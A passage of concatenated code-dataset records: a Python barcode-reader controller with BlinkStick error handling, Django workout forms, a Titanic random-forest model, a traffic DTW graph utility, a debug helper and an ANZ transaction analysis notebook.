deviceDescription )\n #print (\"Device SerialNumber : \" + deviceSerialNumber )\n startup()\n logger.info(\"BlinkStick is attached\")\n return True\n else:\n logger.info(\"BlinkStick is NOT attached.\") \n return False\n except Exception as e:\n return False\n\n# This will refresh the usb port for the Blink stick after it fails to initialize\n# (Without this command it is not possible to call blinkstick.find_first()\n# (a second time (an un recoverable exception error unless it is plugged back in and is reset)\ndef resetBlinkStick():\n return\n print (\"resetting BlinkStick\")\n dev = finddev(idVendor = 0x20a0, idProduct = 0x41e5)\n if dev is not None:\n logger.info(\"Resetting usb port after Blink Stick has been attached.\")\n dev.reset()\n return True\n else:\n return False\n\n# Run the controller\ndef runController():\n global skipBlinkStick, startupCompleted, sp\n lastError = None\n previousError = None\n startupCompleted = False\n skipBlinkStick = False\n logger.info(\"Controller Started.\")\n \n while True:\n try:\n if startupCompleted == False:\n logger.info(\"Initializing BlinkStick.\")\n startup()\n \n barcode = readBarcode()\n if pingServer(ThisSystem.log_server) == True:\n pingSuccess()\n else:\n raise ConnectionError\n\n if barcode is None:\n time.sleep (0.1)\n continue\n \n if len(barcode) > 0: \n ID = 
log(barcode,ThisSystem.instrumentID)\n logger.info(\"Barcode : \" + barcode + \" ID returned from server : \" + str(ID)) \n previousError = None\n skipBlinkStick = False\n\n except blinkstick.BlinkStickException as e:\n lastError = e\n\n if str(lastError) != str(previousError):\n lastErrorMsg = \"Blink Stick Exception. Url : \" + ThisSystem.log_server\n logger.info(lastError)\n skipBlinkStick = True\n resetBlinkStick()\n fail()\n logger.error(lastError)\n previousError=lastError\n\n except AttributeError as e:\n\n print (\"Attribute Error\")\n if str(lastError) != str(previousError):\n lastErrorMsg = \"Blink Stick Attubute Exception. Url : \" + ThisSystem.log_server\n logger.info(lastError)\n skipBlinkStick = True\n fail()\n logger.error(lastError)\n previousError=lastError\n resetBlinkStick()\n\n except USBError as e:\n lastError = e\n \n if str(lastError) != str(previousError):\n lastErrorMsg = \"Blink Stick Exception. Url : \" + ThisSystem.log_server\n logger.info(lastError)\n skipBlinkStick = True\n fail()\n logger.error(lastError)\n previousError=lastError \n \n except ConnectionError as e:\n lastError = e\n if str(lastError) != str(previousError):\n \n previousError = lastError\n lastErrorMsg = str(lastError) + \"server : \" + ThisSystem.log_url\n fail()\n logger.error(lastErrorMsg)\n \n \n except NoSuchSerialPort as e:\n lastError = e\n sp = None\n \n if str(lastError) != str(previousError):\n \n previousError = lastError\n lastErrorMsg = \"Cannot find serial port device: \" + ThisSystem.serialPort + \". Barcode reader may not be attached or the port name is incorrect.\"\n fail()\n logger.error(lastErrorMsg)\n sendEmail(str(lastErrorMsg))\n # give time for scanner to initialize\n time.sleep(10)\n \n except SerialException as e:\n lastError = e\n sp = None \n if str(lastError) != str(previousError):\n previousError = lastError\n lastErrorMsg = \"Serial Port error: \" + ThisSystem.serialPort + \". Barcode reader may not be attached or there is some other error.\"\n fail()\n logger.error(lastError)\n sendEmail(str(lastErrorMsg))\n previousError=lastError\n\n except PingServerError as e:\n lastError = e\n\n if str(lastError) != str(previousError):\n lastErrorMsg = \"Ping server error. Url : \" + ThisSystem.log_server\n logger.info(lastError)\n fail()\n logger.error(lastError)\n previousError=lastError\n\n except BrokenPipeError as e:\n lastError = e\n print (\"broken pipe caught\")\n print (lastError)\n if str(lastError) != str(previousError):\n lastErrorMsg = \"BrokenPipeError. 
Url : \" + ThisSystem.log_server\n logger.info(lastError)\n fail()\n logger.error(lastError)\n previousError=lastError\n resetBlinkStick()\n\n except Exception as e:\n lastError = e\n typeError = type(e).__name__\n if \"USBERR\" not in typeError:\n \n print (\"Unanticipated exception\")\n print (type(e).__name__)\n print (e.__class__.__name__)\n print (lastError)\n skipBlinkStick = True\n #resetBlinkStick()\n if str(lastError) != str(previousError):\n \n previousError = lastError\n lastErrorMsg = \"Exception error : \" + str(lastError)\n fail()\n logger.error(lastError)\n sendEmail(str(lastErrorMsg))\n previousError=lastError\n\n# Custom Exceptions\nclass Error(Exception):\n \"\"\"Base class for other exceptions\"\"\"\n pass\n\n##class BlinkStickException(Error):\n## \"\"\"Raised when the Blinkstick cannot be initialized\"\"\"\n## pass\n\nclass USBError(Error):\n \"\"\"Raised when the Blinkstick cannot be initialized\"\"\"\n pass\n\nclass NoSuchSerialPort(Error):\n \"\"\"Raised when the serial port does not exist\"\"\"\n pass\n\nclass PingServerError(Error):\n \"\"\"Raised when the Blinkstick cannot be initialized\"\"\"\n pass\n\nif __name__ == '__main__':\n runController()\n","repo_name":"russomf/IoT_controller","sub_path":"python_controller/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":16326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12637947472","text":"import collections\nimport itertools\n\nfrom django import forms\n\nfrom explodio.common import iterator\nfrom explodio.common.forms import FormHelpersMixin\nfrom explodio.xfit import models\n\n\nclass ScoreForm(forms.Form):\n \"\"\"\n Base form for keeping score of a Workout\n \"\"\"\n pass\n\nclass TimeForm(ScoreForm):\n \"\"\"\n Score Form for Time\n \"\"\"\n time = forms.TimeField(required=False, label=\"Time (HH:MM:SS)\")\n\nclass RoundsForm(ScoreForm):\n \"\"\"\n Score Form for Rounds\n \"\"\"\n rounds = forms.IntegerField(min_value=0, required=False,\n label='Rounds/Reps')\n\nclass WODExerciseForm(forms.ModelForm, FormHelpersMixin):\n \"\"\"\n Individual form for a WODExercise for a user to fill out\n \"\"\"\n\n # Require fields if the value of the attribute is not empty\n REQUIRE_IF_VALUE = (\n ('effort', 'effort_unit'),\n ('reps', 'reps_unit'),\n )\n\n class Meta:\n fields = ('effort', 'reps', 'notes')\n model = models.WODExercise\n\n def __init__(self, goal, *args, **kwargs):\n \"\"\"\n Construct a WODExerciseForm for a given goal\n\n effort / reps fields are deleted if they are not set in the goal.\n\n :param goal: The WorkoutExercise with the target effort/reps\n :param args: ModelForm *args\n :param kwargs: ModelForm **kwargs\n :return: self\n \"\"\"\n super(WODExerciseForm, self).__init__(*args, **kwargs)\n\n self.goal = goal\n\n for required, if_clone in WODExerciseForm.REQUIRE_IF_VALUE:\n if not getattr(goal, if_clone):\n del self.fields[required]\n\n def save(self, user_wod, commit=True):\n \"\"\"\n Save this WODExercise to a user_wod.\n To save DB, we only save if there are values in the fields.\n :param user_wod: The parent UserWOD to save to\n :param commit: Whether or not the commit the save\n :return: The new or updated WODExercise\n \"\"\"\n\n should_save = False\n\n for field in ('effort', 'reps', 'notes'):\n if self.cleaned_data.get(field):\n should_save = True\n break\n\n if self.instance and self.instance.id and not should_save:\n self.instance.delete()\n elif should_save:\n instance = super(WODExerciseForm, 
self).save(commit=False)\n instance.user_wod = user_wod\n instance.goal = self.goal\n if commit:\n instance.save()\n return instance\n\nclass UserWODForm(object):\n\n def __init__(self, user, wod, user_wod, prefix, data):\n \"\"\"\n Contruct a UserWOD form-container object, of sort which is capable\n of validation and saving\n\n :param user: User owning the UserWOD\n :param wod: WorkoutOfTheDay this User is performing\n :param user_wod: A pre-existing UserWOD (can be None)\n :param prefix: Form prefix, prevents POST data name collisions\n :param data: Default form data for child forms\n :return: self\n \"\"\"\n self.data = data\n self.user = user\n self.wod = wod\n self.user_wod = user_wod\n\n # Calculated\n self.prefix = 'wod-%s-%s' % (wod.id, prefix)\n self.workout_type = self.wod.workout.workout_type\n\n # Computed\n self.score_form = self.create_score_form()\n self.wod_exercise_forms = self.create_wod_exercise_forms()\n\n def create_score_form(self):\n \"\"\"\n Construct the appropriate score form for\n the WorkoutOfTheDay's workout_type\n :return: A django Form\n \"\"\"\n if self.workout_type == models.Workout.WORKOUT_TYPE_TIMED:\n if self.user_wod:\n initial = {'time': self.user_wod.time}\n else:\n initial = None\n return TimeForm(self.data, prefix=self.prefix, initial=initial)\n elif self.workout_type == models.Workout.WORKOUT_TYPE_AMRAP:\n if self.user_wod:\n initial = {'rounds': self.user_wod.rounds}\n else:\n initial = None\n return RoundsForm(self.data, prefix=self.prefix, initial=initial)\n elif self.workout_type == models.Workout.WORKOUT_TYPE_POWER:\n pass\n else:\n raise Exception('Unknown workout type')\n\n def create_wod_exercise_forms(self):\n \"\"\"\n Create children WODExerciseForms, one for each repetition of each\n exercise in the WorkoutOfTheDay's Workout\n :return: list of WODExerciseForms\n \"\"\"\n pairs = self.create_goal_wodexercise_pairs_iter()\n\n wod_exercise_forms = []\n\n for index, pair in enumerate(pairs):\n goal, wod_exercise = pair\n prefix = '%sex%s' % (self.prefix, index)\n wod_exercise_form = WODExerciseForm(goal, self.data,\n instance=wod_exercise, prefix=prefix)\n wod_exercise_forms.append(wod_exercise_form)\n\n return wod_exercise_forms\n\n def create_goal_wodexercise_pairs_iter(self):\n \"\"\"\n Pair the WorkoutOfTheDay's WorkoutExercise the the\n current UserWOD's WODExercises by goal (WorkoutExercise)\n If there is no current user_wod, pairs WorkoutExercises with None.\n :return: list of (WorkoutExercise, WODExercise)\n or (WorkoutExercise, None)\n \"\"\"\n goals = self.get_repeated_exercises(self.wod.workout)\n\n if not self.user_wod:\n # If there is no UserWOD, build (WorkoutExercise, None) tuples\n wod_exercises = [None] * len(goals)\n pairs = itertools.izip(goals, wod_exercises)\n else:\n # If there is a UserWOD, build (WorkoutExercise, WODExercise) tuples\n wod_exercises = self.user_wod.wod_exercises \\\n .order_by('goal__item_group', 'goal__order', 'pk')\n pairs = iterator.pair_left(goals, wod_exercises, match_once=True,\n searcher=lambda goal, wod_exercise: \\\n wod_exercise.goal.id == goal.id)\n pairs = iter(pairs)\n return pairs\n\n def get_repeated_exercises(self, workout):\n \"\"\"\n For each WorkoutExercise group in a Workout, yield that group repeated\n as necessary.\n\n For example, if the WorkoutExercise set looks like:\n - Exercise 1: Group A repeat 2x\n - Exercise 2: Group A repeat 2x\n - Exercise 3: Group B repeat 1x\n - Exercise 4: Group C repeat 2x\n - Exercise 5: Group C repeat 2x\n\n The resulting list is:\n > A1, A2, A1,A 
2, B3, C4, C5, C4, C5\n :return: list of WorkoutExercise\n \"\"\"\n exercises = workout.exercises.order_by('item_group', 'order')\n return list(self.repeat_exercises_iter(exercises))\n\n def repeat_exercises_iter(self, exercises):\n \"\"\"\n Repeat exercises by `item_group,` `item_group_repeats` times\n :param goals: list of WorkoutExercise\n :return: longer list of WorkoutExercise\n \"\"\"\n group_items = collections.OrderedDict()\n\n # In order, add exercises to their respective group\n for exercise in exercises:\n group = exercise.item_group\n if group not in group_items:\n group_items[group] = []\n group_items[group].append(exercise)\n\n # For each group, yield the items in the groups `n` times\n for group, exercises in group_items.iteritems():\n exercise = exercises[0] # Use the first exercise as\n repeat = exercise.item_group_repeats\n for x in xrange(repeat):\n for exercise in exercises:\n yield exercise\n\n def is_valid(self):\n \"\"\"\n Validate each of the child forms this object has\n :return: Whether or not every child form validated\n \"\"\"\n valid = not self.score_form or self.score_form.is_valid()\n for wod_exercise_form in self.wod_exercise_forms:\n valid &= wod_exercise_form.is_valid()\n return valid\n\n def save(self, commit=True):\n \"\"\"\n Create or update a UserWOD with WODExercises\n :param commit: Whether or not to commit the UserWOD to the database\n :return: The new or updated UserWOD\n \"\"\"\n\n # Create a new UserWOD if we need to, or use the initial one\n if self.user_wod is None:\n user_wod = models.UserWOD(user=self.user, wod=self.wod)\n else:\n user_wod = self.user_wod\n\n # Save time OR rounds\n if self.workout_type == models.Workout.WORKOUT_TYPE_TIMED:\n user_wod.time = self.score_form.cleaned_data['time']\n user_wod.rounds = None\n elif self.workout_type == models.Workout.WORKOUT_TYPE_AMRAP:\n user_wod.time = None\n user_wod.rounds = self.score_form.cleaned_data['rounds']\n elif self.workout_type == models.Workout.WORKOUT_TYPE_POWER:\n user_wod.time = None\n user_wod.rounds = None\n else:\n raise Exception('Unknown workout type')\n\n # Create a list of WODExercises to save (or not)\n wod_exercises = []\n for wod_exercise_form in self.wod_exercise_forms:\n wod_exercise = wod_exercise_form.save(user_wod, commit=False)\n wod_exercises.append(wod_exercise)\n\n # If we need to commit, save the UserWOD 1st, then the related objects\n if commit:\n user_wod.save()\n for wod_exercise in wod_exercises:\n if wod_exercise is not None:\n ## wod_exercise would be none if the form above decided\n ## to not save one.\n wod_exercise.user_wod = user_wod\n wod_exercise.save()\n\n return user_wod\n","repo_name":"explodes/explod.io-paste","sub_path":"explodio/xfit/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":9743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2864400124","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np \nfrom sklearn.ensemble import RandomForestRegressor,RandomForestClassifier\n\n#讀data\n# SibSp = 手足 siblings / 配偶 spouses\n# Parch = 父母 parents / 小孩 children\n\n@st.cache(allow_output_mutation=True)\ndef load():\n\tdf=pd.read_csv(\"train.csv\")\n\treturn df\ndf=load()\n\ndtrain=df.filter(regex='Survived|Age|SibSp|Parch|Fare|Sex|Pclass')\n\t\n### 使用 RandomForestRegressor 填補缺失的年齡屬性\n\ndef set_missing_ages(df):\n \n # 把已有的數值型features取出来丟進RandomForestRegressor中\n age_df = df[['Age','Fare', 'Parch', 'SibSp', 'Pclass']]\n \n # 乘客分成已知年齡和未知年齡兩部分\n known_age 
= age_df[age_df.Age.notnull()]\n unknown_age = age_df[age_df.Age.isnull()]\n \n # y即目標年齡\n y = known_age.iloc[:, 0]\n\n # X即feature屬性值\n X = known_age.iloc[:, 1:]\n \n # fit到RandomForestRegressor之中\n rfr = RandomForestRegressor(random_state=0, n_estimators=500, n_jobs=-1)\n rfr.fit(X, y)\n \n # 用得到的模型進行未知年齡結果預測\n predictedAges = rfr.predict(unknown_age.iloc[:, 1:])\n\n # 用得到的預測結果填補原缺失data\n df.loc[ (df.Age.isnull()), 'Age' ] = predictedAges \n return df,rfr\n\t\ndtrain, rfr = set_missing_ages(dtrain)\n\ndef preprocessing(df): \n\t#familysize\n\tdf['Familysize']=df['Parch']+df['SibSp']\n\n\t#child\n\tdf[\"Child\"] = df[\"Age\"].apply(lambda x: 1 if x < 15 else 0)\n\t\n\t#Mother\n\tdf['Mother']='0'# DataFrame增加一直行\n\tdf.loc[(df['Sex']==str(\"female\")) & (df['Parch']>=1) ,'Mother']=1\n\treturn df\ndtrain=preprocessing(dtrain)\n\n#one hot encoding\ndef onehot(df):\n\td_Sex=pd.get_dummies(df['Sex'],prefix='Sex')\n\td_Pclass=pd.get_dummies(df['Pclass'],prefix='Pclass')\n\n\t#把處理後的新增回dtrain,df\n\tdf=pd.concat([df,d_Sex,d_Pclass],axis=1)\n\tdf.drop(['Sex','Pclass'],axis=1,inplace=True)\n\treturn df\ndtrain=onehot(dtrain)\n\n\ntrain_df=dtrain.filter(regex='Survived|Age|SibSp|Parch|Familysize|Fare|Sex_.*|Pclass_.*|Child|Mother')\n\n\n#y即Survival結果\ny = train_df['Survived'].values\n\n#X即features屬性值\nX = train_df.iloc[:, 1:].values\n\nrfr1 = RandomForestClassifier(n_estimators=500,criterion='gini',min_samples_split=12,min_samples_leaf=1,random_state=1,n_jobs=-1) \n\t\t\t\t\t\t\t \nrfr1.fit(X,y)\n\n#return a tuple\ndef makeprediction(df):\n\tprediction=rfr1.predict(df)\n\tprob=rfr1.predict_proba(df)\n\tprob_df=pd.DataFrame(prob,columns=['Dead','Survived'])\n\tdead_prob=prob_df.loc[0,'Dead']\n\tsurvived_prob=prob_df.loc[0,'Survived']\n\treturn dead_prob,survived_prob","repo_name":"ytchen175/Titanic_test","sub_path":"module/titanic.py","file_name":"titanic.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"5990169437","text":"import csv\nimport os\nimport numpy as np\nfrom fastdtw import fastdtw\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\nimport argparse\nimport pdb\nimport torch\nimport pandas as pd\n\nimport sys\nsys.path.append(\"..\")\n\nfrom trainer.dataloader import Dataset_Traffic\nfrom utils.data_utils import Single_Data_Container\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--city\", default=\"yizhuang\", type=str, help=\"specific fine-tune dataset\")\n parser.add_argument(\"--data_path\", default=\"../../data\", type=str)\n parser.add_argument(\"--flow_file\", default=\"2023_01_03_flow.csv\", type=str)\n parser.add_argument(\"--rel_file\", default=\"connect.csv\", type=str)\n parser.add_argument(\"--nfeat_file\", default=\"node_feature.csv\", type=str)\n parser.add_argument(\"--look_back\", default=24, type=int)\n parser.add_argument(\"--pred_len\", default=12, type=int)\n parser.add_argument(\"--time_dim\", default=4, type=int)\n parser.add_argument(\"--time_encode\", default=\"raw\", type=str)\n args = parser.parse_args()\n return args\n\n\ndef get_data(args):\n \"\"\" 单个城市数据加载器 \"\"\"\n data_dict = {\n args.city: {\n \"flow\": args.flow_file,\n \"rel\": args.rel_file,\n \"nfeat\": args.nfeat_file\n }\n }\n\n data = Single_Data_Container(data_path=args.data_path,\n data_dict=data_dict,\n look_back=args.look_back,\n pred_len=args.pred_len,\n time_encode=args.time_encode)\n\n train_data = Dataset_Traffic(data, mode=\"train\")\n\n res = 
[]\n for idx in tqdm(range(train_data.__len__()), desc=\"collect training data\"):\n if idx % args.look_back == 0:\n x, _, _, _, _ = train_data.__getitem__(idx)\n res.append(x.T)\n \n res = np.array(res) # [K, T, N]\n return res, train_data\n\n\nif __name__ == \"__main__\":\n import os\n import sys\n args = get_args()\n\n train_data, dataset = get_data(args)\n num_node = len(dataset.nids)\n print(num_node)\n\n K, L, N = train_data.shape\n folds = int(288 / L)\n train_data = train_data[:int(K / folds) * folds]\n train_data = train_data.reshape(int(K / folds), folds, L, N)\n train_data = train_data.reshape(int(K / folds), -1, N)\n\n train_data = train_data.reshape(-1, N)\n train_data = dataset.scaler.inverse_transform(train_data)\n \n # train_data = train_data.reshape(-1, 288, N)\n train_data[np.isnan(train_data)] = 0\n train_data = train_data.reshape(-1, num_node, 1)\n\n # data: (K, N, C) 样本: 节点: 特征 \n\n ### DTW Distance\n if not os.path.exists(os.path.join(args.data_path, args.city, \"dtw_distance.npy\")):\n data_mean = np.mean([train_data[:, :, 0][24*12*i: 24*12*(i+1)] for i in range(train_data.shape[0]//(24*12))], axis=0)\n data_mean = data_mean.squeeze().T \n dtw_distance = np.zeros((num_node, num_node))\n for i in tqdm(range(num_node)):\n for j in range(i, num_node):\n dtw_distance[i][j] = fastdtw(data_mean[i], data_mean[j], radius=6)[0]\n for i in range(num_node):\n for j in range(i):\n dtw_distance[i][j] = dtw_distance[j][i]\n \n mean = np.mean(dtw_distance)\n std = np.std(dtw_distance)\n dtw_distance = (dtw_distance - mean) / std\n \n sigma = 0.1\n dtw_distance = np.exp(-dtw_distance ** 2 / sigma ** 2)\n dtw_matrix = np.zeros_like(dtw_distance)\n dtw_matrix[dtw_distance > 0.6] = 1\n\n np.save(os.path.join(args.data_path, args.city, \"dtw_distance.npy\"), dtw_matrix)\n print(f'average degree of semantic graph is {np.sum(dtw_matrix > 0)/2/num_node}')\n","repo_name":"zruiii/DeSTR","sub_path":"src/utils/STGODE_utils.py","file_name":"STGODE_utils.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1344918722","text":"\"\"\"Debug helper\n\nThe purpose of this file is to help during development.\n\nThe idea is to silence internal exceptions raised by Friendly\nitself for most users by redirecting them here, and have them\nprinted only when debugging mode is activated.\n\"\"\"\nimport sys\nimport os\n\n# DEBUG is set to True for me. It can also be set to True from __main__ or when\n# using the debug() command in the console.\n\nIS_PYDEV = bool(os.environ.get(\"PYTHONDEVMODE\", False))\nIS_ANDRE = r\"users\\andre\\github\\friendly\" in __file__.lower()\nDEBUG = IS_PYDEV or IS_ANDRE\nEXIT = False\n\n\ndef log(text):\n if DEBUG: # pragma: no cover\n print(text)\n\n\ndef log_error(exc=None):\n global EXIT\n if DEBUG: # pragma: no cover\n from . 
import explain_traceback\n\n if exc is not None:\n print(repr(exc))\n if not EXIT:\n EXIT = True\n explain_traceback()\n log(\"Fatal error - aborting\")\n sys.exit()\n","repo_name":"aroberge/friendly","sub_path":"friendly/debug_helper.py","file_name":"debug_helper.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":325,"dataset":"github-code","pt":"78"} +{"seq_id":"22828724773","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## Business Understanding\n\n# Task 1: Segment the dataset and draw unique insights, including visualisation of the transaction volume and assessing the effect of any outliers.\n\n# # The Dataset\n# The synthesised transaction dataset contains 3 months’ worth of transactions for 100 hypothetical customers. It contains purchases, recurring transactions, and salary transactions.\n# \n# The dataset is designed to simulate realistic transaction behaviours that are observed in ANZ’s real transaction data, so many of the insights you can gather from the tasks below will be genuine.\n\n# ## Importing the required libraries\n\n# In[50]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n# ## Reading the Dataset\n\n# In[5]:\n\n\nANZ = pd.read_excel(r\"C:\\Users\\seyi\\Downloads\\ANZ synthesised transaction dataset.xlsx\")\n\n\n# In[6]:\n\n\nANZ.head()\n\n\n# In[7]:\n\n\nANZ.info()\n\n\n# In[8]:\n\n\nANZ.shape\n\n\n# In the ANZ dataset, there are 23 different columns and 12043 observations\n\n# In[9]:\n\n\nANZ.columns\n\n\n# In[10]:\n\n\nANZ.describe()\n\n\n# To confirm that we are dealing with 100 hypothetical customers:\n\n# In[11]:\n\n\nANZ['account'].nunique()\n\n\n# ## Taking the relevant features\n\n# In[12]:\n\n\nANZ = ANZ[[\"status\",\"card_present_flag\",\"balance\",\"date\",\n \"gender\",\"age\",\"merchant_suburb\",\"merchant_state\",\n \"amount\",\"customer_id\",\"movement\"]]\nANZ[\"date\"] = pd.to_datetime(ANZ[\"date\"])\nANZ.head()\n\n\n# In[13]:\n\n\nNull_values = ANZ.isnull().sum().sort_values(ascending=False)\n\n\n# In[14]:\n\n\nNull_values\n\n\n# ## Exploratory Data Analysis (including Visualizations)\n\n# ### Total number of autorized and posted status\n\n# In[15]:\n\n\nANZ['status'].value_counts()\n\n\n# ### Total number of transactions made on each day\n\n# In[16]:\n\n\nANZ['date'].value_counts()\n\n\n# ### Total number of transactions made by each customer\n\n# In[17]:\n\n\nANZ['customer_id'].value_counts()\n\n\n# ### Transaction volume made by customers each day\n\n# In[18]:\n\n\nANZ_date_count = ANZ.groupby('date').count()\n\n\n# In[19]:\n\n\ntransaction_volume = ANZ_date_count['customer_id'].mean()\n\n\n# In[20]:\n\n\nlength = len(ANZ_date_count.index)\n\n\n# In[21]:\n\n\nplt.figure()\nplt.plot(ANZ_date_count.index, ANZ_date_count[\"customer_id\"], c=\"blue\", label = \"Customer ID\")\nplt.plot(ANZ_date_count.index, np.linspace(transaction_volume,transaction_volume,length), c=\"g\", label = \"mean transaction volume\")\nplt.title(\"ANZ Transaction Volume vs. 
Date\")\nplt.xlabel(\"Date\")\nplt.ylabel(\"Number of customers\")\nplt.legend()\nplt.tight_layout()\n\n\n# ## What is the average transaction amount?\n\n# In[22]:\n\n\nANZ_date_mean = ANZ.groupby('date').mean()\n\n\n# In[23]:\n\n\ntransaction_amount = ANZ_date_count['amount'].mean()\n\n\n# In[24]:\n\n\nlength = len(ANZ_date_count.index)\n\n\n# In[25]:\n\n\nplt.figure()\nplt.plot(ANZ_date_count.index, ANZ_date_mean[\"amount\"], c=\"red\", label = \"Amount\")\nplt.plot(ANZ_date_count.index, np.linspace(transaction_amount,transaction_amount,length), c=\"b\", label = \"Overall mean transaction amount\")\nplt.title(\"ANZ mean Transaction Amount vs. Date\")\nplt.xlabel(\"Date\")\nplt.ylabel(\"Amount ($)\")\nplt.legend()\nplt.tight_layout()\n\n\n# ## What is the average customer balance and payment amount by Age\n\n# In[26]:\n\n\nmonths = []\nfor date in ANZ[\"date\"]:\n if date.month == 8:\n months.append(\"August\")\n elif date.month == 9:\n months.append(\"September\")\n elif date.month == 10:\n months.append(\"October\")\n\nANZ[\"Months\"] = months\nANZ[\"Months\"].head()\n\n\n# ### For August:\n\n# In[27]:\n\n\nANZ_cus_aug = ANZ[ANZ[\"Months\"] == \"August\"].groupby(\"customer_id\").mean()\n\n\n# In[28]:\n\n\nANZ_gen_aug = ANZ[ANZ[\"Months\"] == \"August\"].groupby(\"gender\").mean()\n\n\n# In[29]:\n\n\nmean_f_bal_aug = ANZ_gen_aug[\"balance\"].iloc[0]\nmean_m_bal_aug = ANZ_gen_aug[\"balance\"].iloc[1]\nlength = len(ANZ_cus_aug[\"age\"])\n\n\n# In[47]:\n\n\nplt.figure()\nplt.scatter(ANZ_cus_aug[\"age\"], ANZ_cus_aug[\"balance\"], c=\"red\", label=\"Balance\")\nplt.plot(ANZ_cus_aug[\"age\"], np.linspace(mean_f_bal_aug,mean_f_bal_aug,length), c=\"g\", label = \"mean female balance\")\nplt.plot(ANZ_cus_aug[\"age\"], np.linspace(mean_m_bal_aug,mean_m_bal_aug,length), c=\"b\", label = \"mean male balance\")\nplt.title(\"ANZ Average Customer Balance vs. Age for August\")\nplt.xlabel(\"Age (years)\")\nplt.ylabel(\"Balance ($)\")\nplt.legend()\nplt.tight_layout()\n\n\n# In[31]:\n\n\nmean_f_amt_aug = ANZ_gen_aug[\"amount\"].iloc[0]\nmean_m_amt_aug = ANZ_gen_aug[\"amount\"].iloc[1]\n\n\n# In[48]:\n\n\nplt.scatter(ANZ_cus_aug[\"age\"], ANZ_cus_aug[\"amount\"], c=\"orange\", label=\"Amount\")\nplt.plot(ANZ_cus_aug[\"age\"], np.linspace(mean_f_amt_aug,mean_f_amt_aug,length), c=\"r\", label = \"mean female amount\")\nplt.plot(ANZ_cus_aug[\"age\"], np.linspace(mean_m_amt_aug,mean_m_amt_aug,length), c=\"b\", label = \"mean male amount\")\nplt.title(\"ANZ Customer Average Payment Amount vs. Age for August\")\nplt.xlabel(\"Age (years)\")\nplt.ylabel(\"Amount ($)\")\nplt.legend()\nplt.tight_layout()\n\n\n# ### For September:\n\n# In[33]:\n\n\nANZ_cus_sep = ANZ[ANZ[\"Months\"] == \"September\"].groupby(\"customer_id\").mean()\nANZ_gen_sep = ANZ[ANZ[\"Months\"] == \"September\"].groupby(\"gender\").mean()\n\n\n# In[34]:\n\n\nmean_f_bal_sep = ANZ_gen_sep[\"balance\"].iloc[0]\nmean_m_bal_sep = ANZ_gen_sep[\"balance\"].iloc[1]\nlength = len(ANZ_cus_sep[\"age\"])\n\n\n# In[49]:\n\n\nplt.figure()\nplt.scatter(ANZ_cus_sep[\"age\"], ANZ_cus_sep[\"balance\"], c=\"grey\", label=\"Balance\")\nplt.plot(ANZ_cus_sep[\"age\"], np.linspace(mean_f_bal_sep,mean_f_bal_sep,length), c=\"r\", label = \"mean female balance\")\nplt.plot(ANZ_cus_sep[\"age\"], np.linspace(mean_m_bal_sep,mean_m_bal_sep,length), c=\"b\", label = \"mean male balance\")\nplt.title(\"ANZ Customer Balance vs. 
Age for September\")\nplt.xlabel(\"Age (years)\")\nplt.ylabel(\"Balance ($)\")\nplt.legend()\nplt.tight_layout()\n\n\n# In[36]:\n\n\nmean_f_amt_sep = ANZ_gen_sep[\"amount\"].iloc[0]\nmean_m_amt_sep = ANZ_gen_sep[\"amount\"].iloc[1]\n\n\n# In[37]:\n\n\nplt.scatter(ANZ_cus_sep[\"age\"], ANZ_cus_sep[\"amount\"], c=\"green\", label=\"Amount\")\nplt.plot(ANZ_cus_sep[\"age\"], np.linspace(mean_f_amt_sep,mean_f_amt_sep,length), c=\"r\", label = \"mean female amount\")\nplt.plot(ANZ_cus_sep[\"age\"], np.linspace(mean_m_amt_sep,mean_m_amt_sep,length), c=\"b\", label = \"mean male amount\")\nplt.title(\"ANZ Customer mean Payment Amount vs. Age for September\")\nplt.xlabel(\"Age (years)\")\nplt.ylabel(\"Amount ($)\")\nplt.legend()\nplt.tight_layout()\n\n\n# ### For October:\n\n# In[38]:\n\n\nANZ_cus_oct = ANZ[ANZ[\"Months\"] == \"October\"].groupby(\"customer_id\").mean()\nANZ_gen_oct = ANZ[ANZ[\"Months\"] == \"October\"].groupby(\"gender\").mean()\n\n\n# In[39]:\n\n\nmean_f_bal_oct = ANZ_gen_oct[\"balance\"].iloc[0]\nmean_m_bal_oct = ANZ_gen_oct[\"balance\"].iloc[1]\nlength = len(ANZ_cus_oct[\"age\"])\n\n\n# In[40]:\n\n\nplt.figure()\nplt.scatter(ANZ_cus_oct[\"age\"], ANZ_cus_oct[\"balance\"], c=\"black\", label=\"Balance\")\nplt.plot(ANZ_cus_oct[\"age\"], np.linspace(mean_f_bal_oct,mean_f_bal_oct,length), c=\"r\", label = \"mean female balance\")\nplt.plot(ANZ_cus_oct[\"age\"], np.linspace(mean_m_bal_oct,mean_m_bal_oct,length), c=\"b\", label = \"mean male balance\")\nplt.title(\"ANZ Customer Balance vs. Age for October\")\nplt.xlabel(\"Age (years)\")\nplt.ylabel(\"Balance ($)\")\nplt.legend()\nplt.tight_layout()\n\n\n# In[41]:\n\n\nmean_f_amt_oct = ANZ_gen_oct[\"amount\"].iloc[0]\nmean_m_amt_oct = ANZ_gen_oct[\"amount\"].iloc[1]\n\n\n# In[42]:\n\n\nplt.scatter(ANZ_cus_oct[\"age\"], ANZ_cus_oct[\"amount\"], c=\"purple\", label=\"Amount\")\nplt.plot(ANZ_cus_oct[\"age\"], np.linspace(mean_f_amt_oct,mean_f_amt_oct,length), c=\"r\", label = \"mean female amount\")\nplt.plot(ANZ_cus_oct[\"age\"], np.linspace(mean_m_amt_oct,mean_m_amt_oct,length), c=\"b\", label = \"mean male amount\")\nplt.title(\"ANZ Customer mean Payment Amount vs. 
